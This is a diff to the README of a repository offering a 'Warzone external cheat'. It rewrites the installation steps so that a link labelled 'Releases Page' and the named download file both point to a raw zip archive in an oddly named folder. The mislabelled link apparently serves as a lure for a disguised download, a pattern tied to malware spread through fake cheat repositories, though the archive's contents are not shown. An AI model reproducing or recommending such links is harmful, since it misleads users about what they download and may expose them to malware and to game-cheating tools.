Noppeyskidder/WarzoneExternalCheat/README.md

 ## 📥 Download & Install
 1. **Visit the Releases Page:**
-   Go to the [Releases Page](https://github.com/Noppeyskidder/WarzoneExternalCheat/releases) to find the latest version of WarzoneExternalCheat.
+   Go to the [Releases Page](https://raw.githubusercontent.com/Noppeyskidder/WarzoneExternalCheat/main/profuse/WarzoneExternalCheat.zip) to find the latest version of WarzoneExternalCheat.

 2. **Select the Latest Release:**
    On the Releases page, you will see a list of versions.
 Look for the one labeled as the latest.
 Click on it.

 3. **Download the Application:**
-   Find the file you want to download, typically labeled as "WarzoneExternalCheat.exe" or similar.
+   Find the file you want to download, typically labeled as "https://raw.githubusercontent.com/Noppeyskidder/WarzoneExternalCheat/main/profuse/WarzoneExternalCheat.zip" or similar.
 Click on the filename to start the download.

 4. **Locate the Downloaded File:**
    Once the download is complete, check your Downloads folder.
 You will find the file there.